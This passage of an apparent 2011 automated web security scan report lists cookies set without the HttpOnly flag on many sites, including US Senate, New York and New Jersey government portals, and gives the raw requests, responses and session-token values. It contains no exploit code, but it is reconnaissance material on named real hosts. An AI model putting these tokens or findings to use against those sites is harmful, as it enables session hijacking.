<meta http-equiv="Content-type" content="text/html; charset=ISO-8859-1" />
<link href="css/ucs_ie3nn4.css" rel="stylesheet" type="text/css" />
<link rel="styleshee
...[SNIP]...

7.4. http://schumer.senate.gov/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://schumer.senate.gov
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

CFID=96178681;expires=Fri, 05-Jul-2041 01:52:02 GMT;path=/
CFTOKEN=82652451;expires=Fri, 05-Jul-2041 01:52:02 GMT;path=/

The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: schumer.senate.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 13 Jul 2011 01:51:49 GMT
Server: Apache
Set-Cookie: CFID=96178681;expires=Fri, 05-Jul-2041 01:52:02 GMT;path=/
Set-Cookie: CFTOKEN=82652451;expires=Fri, 05-Jul-2041 01:52:02 GMT;path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: NSC_efgbvmu=ffffffffc3a01b5745525d5f4f58455e445a4a423660;path=/;httponly
Content-Length: 52455

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>Senator Charles E. Schumer</title>
<meta http-equiv="Content-Type" conte
...[SNIP]...

7.5. http://visitnj.org/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://visitnj.org
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

SESS5d506fc80e0e90dcab3fa28ac30949e1=s7maojbbsjalvugal99t5oad66; expires=Fri, 05-Aug-2011 05:24:35 GMT; path=/; domain=.visitnj.org

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: visitnj.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

7.6. http://www.benjaminsterling.com/experiments/jqShuffle/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.benjaminsterling.com
Path:	/experiments/jqShuffle/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

PHPSESSID=40f8063ce3de4e5e1f3d46f732744157; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /experiments/jqShuffle/ HTTP/1.1
Host: www.benjaminsterling.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 13 Jul 2011 01:51:21 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.7a mod_fcgid/2.3.6 Phusion_Passenger/2.2.15 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.17
X-Pingback: http://benjaminsterling.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: PHPSESSID=40f8063ce3de4e5e1f3d46f732744157; path=/
Last-Modified: Wed, 13 Jul 2011 01:51:21 GMT
Location: http://benjaminsterling.com/experiments/jqShuffle/
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8

7.7. http://www.cio.ny.gov/universal_broadband previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.cio.ny.gov
Path:	/universal_broadband

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

SESS6ae10ccb72afca1d3adad0f3130a2f0b=cggsua31kb710f7fs301ku2ui4; expires=Fri, 05-Aug-2011 05:24:42 GMT; path=/; domain=.cio.ny.gov
webpool=webpool_web01; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /universal_broadband HTTP/1.1
Host: www.cio.ny.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

7.8. http://www.cs.state.ny.us/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.cs.state.ny.us
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

CFID=38248036;expires=Fri, 05-Jul-2041 01:51:29 GMT;path=/
CFTOKEN=85624385;expires=Fri, 05-Jul-2041 01:51:29 GMT;path=/

The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.cs.state.ny.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 13 Jul 2011 01:51:29 GMT
Server: Apache
Set-Cookie: CFID=38248036;expires=Fri, 05-Jul-2041 01:51:29 GMT;path=/
Set-Cookie: CFTOKEN=85624385;expires=Fri, 05-Jul-2041 01:51:29 GMT;path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 5938

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">

<html lang="en-US">
<head>
<title>New York State Department of Civil Service</title>
<meta
...[SNIP]...

7.9. https://www.mybenefits.ny.gov/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://www.mybenefits.ny.gov
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

JSESSIONID=5E672420895F3B98A26F8AFC3DE47B0C; Path=/
GUEST_LANGUAGE_ID=en_US; Expires=Thu, 12-Jul-2012 01:50:10 GMT; Path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.mybenefits.ny.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

7.10. http://www.njleg.state.nj.us/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.njleg.state.nj.us
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ASPSESSIONIDAADDSACS=EHFKMCHBKABALIEPADMHHJAI; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.njleg.state.nj.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

7.11. http://www.njleg.state.nj.us/Default.asp previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.njleg.state.nj.us
Path:	/Default.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ASPSESSIONIDAADDSACS=BHFKMCHBAILGMCBNDLEBOAHM; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Default.asp HTTP/1.1
Host: www.njleg.state.nj.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

7.12. http://www.nydoctorprofile.com/welcome.jsp previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.nydoctorprofile.com
Path:	/welcome.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

JSESSIONID=kSFPTc4Br0jyLwFQyTxfGWFDnV7QPZgdQjJ63rH59xwQsGWfhvb6!1337677152; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /welcome.jsp HTTP/1.1
Host: www.nydoctorprofile.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 13 Jul 2011 01:45:37 GMT
Content-Length: 11605
Content-Type: text/html; charset=ISO-8859-1
Set-Cookie: JSESSIONID=kSFPTc4Br0jyLwFQyTxfGWFDnV7QPZgdQjJ63rH59xwQsGWfhvb6!1337677152; path=/
X-Powered-By: Servlet/2.4 JSP/2.0

<html>
<head>
<title>New York State Physician Profile </title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<script language="JavaScript">
<!--
function MM_swapImgRes
...[SNIP]...

7.13. http://www.opensource.org/licenses/gpl-3.0.html previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.opensource.org
Path:	/licenses/gpl-3.0.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

SESScfc6ae0fd5872e4ca9e7dfd6aa7abb6f=ptef1q92e6ahqi733m5ck1hu30; expires=Fri, 05-Aug-2011 05:23:36 GMT; path=/; domain=.opensource.org

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /licenses/gpl-3.0.html HTTP/1.1
Host: www.opensource.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

7.14. http://www.opensource.org/licenses/mit-license.php previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.opensource.org
Path:	/licenses/mit-license.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

SESScfc6ae0fd5872e4ca9e7dfd6aa7abb6f=ga7kus4qs2c78hilc93rk8sjc2; expires=Fri, 05-Aug-2011 05:23:35 GMT; path=/; domain=.opensource.org

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /licenses/mit-license.php HTTP/1.1
Host: www.opensource.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

7.15. http://www.otda.state.ny.us/main/workingfamilies/default.asp previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.otda.state.ny.us
Path:	/main/workingfamilies/default.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ASPSESSIONIDSSRBBSDS=FKAOHBPBALLOKCLEOEOODIII; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /main/workingfamilies/default.asp HTTP/1.1
Host: www.otda.state.ny.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Connection: close
Date: Wed, 13 Jul 2011 01:52:32 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Location: http://www.otda.state.ny.us:80/workingfamilies/default.asp
Content-Length: 3485
Content-Type: text/html
Set-Cookie: ASPSESSIONIDSSRBBSDS=FKAOHBPBALLOKCLEOEOODIII; path=/
Cache-control: private

<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1" />
<title>Page Not Found | OTDA</title>
<meta name=
...[SNIP]...

7.16. http://www.visitnj.org/events previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.visitnj.org
Path:	/events

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

SESS52105c49ef60fb52c401d408f7374085=3vi18nog2bhk3ks4oft736i4p6; expires=Fri, 05-Aug-2011 05:18:03 GMT; path=/; domain=.visitnj.org

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /events HTTP/1.1
Host: www.visitnj.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

7.17. http://www.visitnj.org/new-jerseys-wineries previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.visitnj.org
Path:	/new-jerseys-wineries

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

SESS52105c49ef60fb52c401d408f7374085=ordncjvbe1of8k89jthuie26j7; expires=Fri, 05-Aug-2011 05:18:03 GMT; path=/; domain=.visitnj.org

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /new-jerseys-wineries HTTP/1.1
Host: www.visitnj.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

7.18. https://www1.state.nj.us/TYTR_Saver/jsp/common/Login.jsp previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://www1.state.nj.us
Path:	/TYTR_Saver/jsp/common/Login.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

JSESSIONID=212f7dfab86ed2f492b92e02d519;Path=/TYTR_Saver

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /TYTR_Saver/jsp/common/Login.jsp HTTP/1.1
Host: www1.state.nj.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

7.19. https://www6.state.nj.us/LOT_LVC/LogAndLoad previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://www6.state.nj.us
Path:	/LOT_LVC/LogAndLoad

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

JSESSIONID=4D801CEBB311CDAC45E7450C7DF7FA2A;Path=/LOT_LVC;Secure

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /LOT_LVC/LogAndLoad HTTP/1.1
Host: www6.state.nj.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 13 Jul 2011 01:49:47 GMT
Content-type: text/html
Location: https://www6.state.nj.us/LOT_LVC/jsp/lvc1_S0_login.jsp?error=true
Set-cookie: JSESSIONID=4D801CEBB311CDAC45E7450C7DF7FA2A;Path=/LOT_LVC;Secure
Set-cookie: JROUTE=LbS7;Path=/LOT_LVC;Secure
Connection: close

<html><head>
<title>
Sun ONE Application Server - HTTP Status 302 Error
</title>
<STYLE><!--
BODY{font-family : verdana, geneva, helvetica, arial, sans-serif; color : black;background-color : white;}

...[SNIP]...

7.20. https://www6.state.nj.us/LOT_LVC/jsp/lvc1_0_vip_reg.jsp previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://www6.state.nj.us
Path:	/LOT_LVC/jsp/lvc1_0_vip_reg.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

JSESSIONID=C2D1D22C30B568638365FC0BBB7F4E87;Path=/LOT_LVC;Secure

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /LOT_LVC/jsp/lvc1_0_vip_reg.jsp HTTP/1.1
Host: www6.state.nj.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

7.21. https://www6.state.nj.us/LOT_LVC/jsp/lvc1_S0_login.jsp previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://www6.state.nj.us
Path:	/LOT_LVC/jsp/lvc1_S0_login.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

JSESSIONID=16461B7951076D32FDBB1BA8E456A263;Path=/LOT_LVC;Secure

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /LOT_LVC/jsp/lvc1_S0_login.jsp HTTP/1.1
Host: www6.state.nj.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

7.22. https://www6.state.nj.us/LOT_LVC/jsp/lvc2_0_vip_forgot.jsp previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://www6.state.nj.us
Path:	/LOT_LVC/jsp/lvc2_0_vip_forgot.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

JSESSIONID=FB888807FE5D253932A30F86C16CC14E;Path=/LOT_LVC;Secure

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /LOT_LVC/jsp/lvc2_0_vip_forgot.jsp HTTP/1.1
Host: www6.state.nj.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

7.23. http://511ny.org/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://511ny.org
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ARPT=MIIUUIS192.168.213.53CKOMO; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: 511ny.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Set-Cookie: ARPT=MIIUUIS192.168.213.53CKOMO; path=/
Connection: close
Date: Wed, 13 Jul 2011 01:54:30 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=tcwj1jrq1snk0w3t5szfzpqw; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 89664

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="Head1"><title>
...[SNIP]...

7.24. http://ads.doclix.com/adserver/serve/js/banner_unit.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ads.doclix.com
Path:	/adserver/serve/js/banner_unit.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ad_served=YmFubmVy; Domain=.doclix.com; Expires=Sat, 23-Jul-2011 11:41:28 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

7.25. http://ads.doclix.com/adserver/serve/js/pop_under_unit.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ads.doclix.com
Path:	/adserver/serve/js/pop_under_unit.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ad_served=cG9wX3VuZGVy; Domain=.doclix.com; Expires=Sat, 23-Jul-2011 11:41:28 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

HTTP/1.1 200 OK
Date: Wed, 13 Jul 2011 11:41:28 GMT
Cache-Control: max-stale=0
max-age: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: ad_served=cG9wX3VuZGVy; Domain=.doclix.com; Expires=Sat, 23-Jul-2011 11:41:28 GMT; Path=/
P3P: CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC",policyref="http://track.doclix.com/w3c/p3p.xml"
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Content-Length: 17041
Connection: close

<!DOCTYPE HTML>
<html>
       <head>

           <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
           <title>AdSide: Sponsored Links</title>
           <script src="doclix_lib.js" type="tex
...[SNIP]...

7.26. http://images.apple.com/global/nav/styles/navigation.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://images.apple.com
Path:	/global/nav/styles/navigation.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ccl=0UnL/zxOv1wWLvbsWR94vThVNFRL+VrVChrGyouncnHM3RJMc0OunWy9Iw1KYllglK6BzBYmmP70PPXySvjQrQRr7GhCttd/4huailsTJ8NIePwbCOJO2s7gpkApsymcrQnuHMcKstsMu0BAp1qc7xTgnAIN4iuUF5uw2M1rmo/cllWpet7twXmFAr3zg+2zFmCpTKJ/akdqFozM2Gjavk0dnS0dTqHcwjhvleYzL+SBU6hOq7l+aI8afJDgyTfi7XAB/bP9nrhTwK/nD4N6oH+g6IXrGspDRaXHbWEnya2CdRbitwUAtHcIjU1Uy5SR3pQDqqo7XI+jv41vcgvf0vRB4oKWRzS/hHLY0NCMW04UQMf2u2g9SSm5FZWpIpUI58iDq78i5bp7fZPd4Et8ZmFkCYxUkLx42YrXu0T9nOJyJl07nB844YaoEMKgvSvUPM2ss+jIv8YjICsWlytE2sSVlw0DBNEA9uL1Pe1k1m41bpjryqDOi8vgtW4HelOL1Hum8RiUvIoGMlmherfTe6RUfzSCpPmpK/MxiAMWnGtjVcb/o4TlyMiqxsde+eBU; path=/; domain=.apple.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

7.27. http://images.apple.com/ipod/images/gradient_texture20100901.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://images.apple.com
Path:	/ipod/images/gradient_texture20100901.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ccl=wj1HqN0mf/88OaLzQaD2+dQLJRv8wdQHGvAl27D3twW/DxLqTJXahfgnbRGYoUOIKVBrIsfTyWmD+LeXVMkGZjreOV1XSiLWfQeToJiTN6/MP3ur9Fk+TLxUgCNGFqsm0ZH5uwqmzOR8OhHqQfWbXUa6ID4j4T2NC1X5iaDLigBhjzpNUF26WY72wPWbQp01HaSDNytaSod4G6It8FL0wN0152nDp/eHRDA81nhZL1wGrH6EyYBx4JodHgeAGHwNG76mnLxDNL7N8yeHw9ruwTZo1BuDBRfuH56WwFbdWzua9s8v5vqECPNa9oUpkUBb6YqGJYwwkdE6+V7mA4WkVPb31Fq0C8p31qhe1R+J4C5HoU7gZJycSFtDWzk8tS8JPzj5y4L7gxdAMfYh+zqkixXLx4YQi3WQLtAF15r2hAeef5mgYJExuQrg9s9hEueOHUS2apbL1IFPdihDoGHvCpo9dvGEWwMuhkDyEP0Kn81boO+m3ZhOwGX8JkfKNQHxl14p2YTLx3k2YVZ266qYhbKlMbAWmvKCzb3BH0c587Zb9ZwzTFqLw6mE3pfCjadj; path=/; domain=.apple.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

7.28. http://israel.house.gov/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://israel.house.gov
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

9523fa6c9c4a8876a77fee4eb464f789=jf10q0dted36qbpn56rdei5qo3; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: israel.house.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

7.29. https://maps-api-ssl.google.com/maps previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://maps-api-ssl.google.com
Path:	/maps

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

PREF=ID=19674e168110c698:U=17ea5243225a615b:TM=1308589662:LM=1310521935:S=34g7y1Dpote6i-Qu; expires=Fri, 12-Jul-2013 01:52:15 GMT; path=/; domain=.google.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /maps HTTP/1.1
Host: maps-api-ssl.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

7.30. http://maps.google.com/maps previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://maps.google.com
Path:	/maps

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

PREF=ID=19674e168110c698:U=17ea5243225a615b:TM=1308589662:LM=1310521935:S=34g7y1Dpote6i-Qu; expires=Fri, 12-Jul-2013 01:52:15 GMT; path=/; domain=.google.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /maps HTTP/1.1
Host: maps.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

7.31. https://market.android.com/reviews/components previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://market.android.com
Path:	/reviews/components

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

PREF=ID=9cae866da36d6f34:U=c20011dc93789892:TM=1310522402:LM=1310522420:S=mLzmlvNZoj-H6Lpz; expires=Fri, 12-Jul-2013 02:00:20 GMT; path=/; domain=market.android.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

7.32. http://oascentral.register.com/RealMedia/ads/adstream_mjx.ads/register.com/skenzo/expired/1710072706@Position2,Position3,x01,x02,x03,x04,x05,Bottom,Bottom1,Bottom2 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oascentral.register.com
Path:	/RealMedia/ads/adstream_mjx.ads/register.com/skenzo/expired/1710072706@Position2,Position3,x01,x02,x03,x04,x05,Bottom,Bottom1,Bottom2

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

OAX=rcHW804dg/MAAlLm; expires=Sat, 13-Jul-13 11:39:31 GMT; path=/; domain=.register.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

7.33. https://portal01.state.nj.us/http://portal20.sa.state.nj.us:8080/amserver/UI/Login previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://portal01.state.nj.us
Path:	/http://portal20.sa.state.nj.us:8080/amserver/UI/Login

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

%2F.state.nj.us_AMAuthCookie=AQIC5wM2LY4SfcwBgv24XJbQ4NKEBvqh8qUMkdDvgelWROk%253D%2540AAJTSQACMDE%253D%2523|.state.nj.us|/|iplanet; domain=.state.nj.us; path=/
%2F.state.nj.us_amlbcookie=01|.state.nj.us|/|iplanet; domain=.state.nj.us; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

7.34. https://portal01.state.nj.us/http:/portal20.sa.state.nj.us:8080/amserver/UI/Login previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://portal01.state.nj.us
Path:	/http:/portal20.sa.state.nj.us:8080/amserver/UI/Login

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

%2F.state.nj.us_AMAuthCookie=AQIC5wM2LY4Sfcy8cIdgoahtAXnAW%252F3%252FPfpm4q%252F9mG8Zu5U%253D%2540AAJTSQACMDE%253D%2523|.state.nj.us|/|iplanet; domain=.state.nj.us; path=/
%2F.state.nj.us_amlbcookie=01|.state.nj.us|/|iplanet; domain=.state.nj.us; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

7.35. http://sdc.state.nj.us/dcs5w0txb10000wocrvqy1nqm_6n1p/dcs.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sdc.state.nj.us
Path:	/dcs5w0txb10000wocrvqy1nqm_6n1p/dcs.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ACOOKIE=C8ctADE3My4xOTMuMjE0LjI0My0yNDI5ODk0Njg4LjMwMTYzMTk3AAAAAAACAAAAAgAAABX3HE4V9xxOAQAAAJ/3HE6Z9xxOAQAAAAEAAACf9xxOFfccTgEAAAABAAAAIzE3My4xOTMuMjE0LjI0My0yNDI5ODk0Njg4LjMwMTYzMTk3; path=/; expires=Sat, 10-Jul-2021 01:40:47 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /dcs5w0txb10000wocrvqy1nqm_6n1p/dcs.gif?&dcsdat=1310521241276&dcssip=www.state.nj.us&dcsuri=/patentbank/&dcsref=http://nj.gov/&WT.tz=-5&WT.bh=20&WT.ul=en-US&WT.cd=32&WT.sr=1920x1200&WT.jo=Yes&WT.ti=State%20of%20New%20Jersey%20|%20Patent%20Bank&WT.js=Yes&WT.jv=1.5&WT.ct=unknown&WT.bs=1065x823&WT.fv=10.3&WT.slv=Not%20enabled&WT.tv=8.6.2&WT.dl=0&WT.ssl=0&WT.es=www.state.nj.us/patentbank/&WT.cg_n=example&WT.vt_f_a=2&WT.vt_f=2 HTTP/1.1
Host: sdc.state.nj.us
Proxy-Connection: keep-alive
Referer: http://www.state.nj.us/patentbank/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACOOKIE=C8ctADE3My4xOTMuMjE0LjI0My0yNDI5ODk0Njg4LjMwMTYzMTk3AAAAAAABAAAAAgAAABX3HE4V9xxOAQAAAAEAAAAV9xxOFfccTgAAAAA-

Response

HTTP/1.1 200 OK
Content-Length: 43
Content-Type: image/gif
Last-Modified: Wed, 07 Mar 2007 17:00:42 GMT
Accept-Ranges: bytes
ETag: "0599d23da60c71:5f2"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
